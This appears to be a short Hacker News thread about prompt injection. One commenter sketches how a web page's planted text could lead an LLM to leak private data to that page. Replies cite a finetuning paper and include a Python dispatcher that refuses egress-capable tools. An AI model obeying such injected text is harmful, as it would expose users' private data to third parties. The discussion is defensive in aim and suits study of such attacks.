Hacker News

nazgul17, last Wednesday at 12:41 PM

Thinking aloud, but couldn't someone create a website containing malicious text that, when quoted in a prompt, convinces the LLM to expose certain private data to the web page? The page could then send that data to a third party itself, without the LLM needing to do so.

This is probably possible to mitigate, but I fear what people more creative, motivated and technically adept could come up with.


Replies

FeepingCreature, last Wednesday at 4:56 PM

At least with finetuning, yes: https://arxiv.org/abs/2512.09742

It's unclear if this technique could also work with in-prompt data.

yunohn, last Wednesday at 9:46 PM

Why does the LLM get to send data to the website? That’s my whole point: if you don’t expose a way for it to send data anywhere, it can’t.
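A minimal sketch of this point, assuming an agent whose tool calls pass through a dispatcher the developer controls. The tool names (`read_note`, `fetch_url`) and the `can_egress` flag are hypothetical, not any real framework's API. The policy lives in ordinary code rather than in the prompt, so injected text can ask for an exfiltration tool but cannot get one executed.

```python
from dataclasses import dataclass
from typing import Callable, Dict


@dataclass(frozen=True)
class Tool:
    """A tool the model may request (hypothetical structure).

    `can_egress` marks any tool that could carry data off the machine:
    HTTP requests, email, even a plain GET of a model-chosen URL, since
    data can be smuggled out in the query string."""
    name: str
    func: Callable[[str], str]
    can_egress: bool


def read_note(arg: str) -> str:
    # Hypothetical local, read-only tool.
    return f"contents of note {arg!r}"


def fetch_url(arg: str) -> str:
    # Hypothetical network tool; the dispatcher below never lets it run.
    raise RuntimeError("network access should be unreachable")


TOOLS: Dict[str, Tool] = {
    "read_note": Tool("read_note", read_note, can_egress=False),
    "fetch_url": Tool("fetch_url", fetch_url, can_egress=True),
}


def dispatch(tool_name: str, arg: str) -> str:
    """Run a model-requested tool call, refusing anything that could send data out.

    The check runs outside the model, so no prompt text (injected or
    otherwise) can talk its way past it."""
    tool = TOOLS.get(tool_name)
    if tool is None:
        return f"refused: unknown tool {tool_name!r}"
    if tool.can_egress:
        return f"refused: {tool_name!r} can send data off-host"
    return tool.func(arg)


if __name__ == "__main__":
    print(dispatch("read_note", "todo"))
    print(dispatch("fetch_url", "https://attacker.example/?d=secret"))
```

Here `dispatch("fetch_url", ...)` returns `"refused: 'fetch_url' can send data off-host"` no matter what URL the model was persuaded to request, while the local `read_note` call goes through.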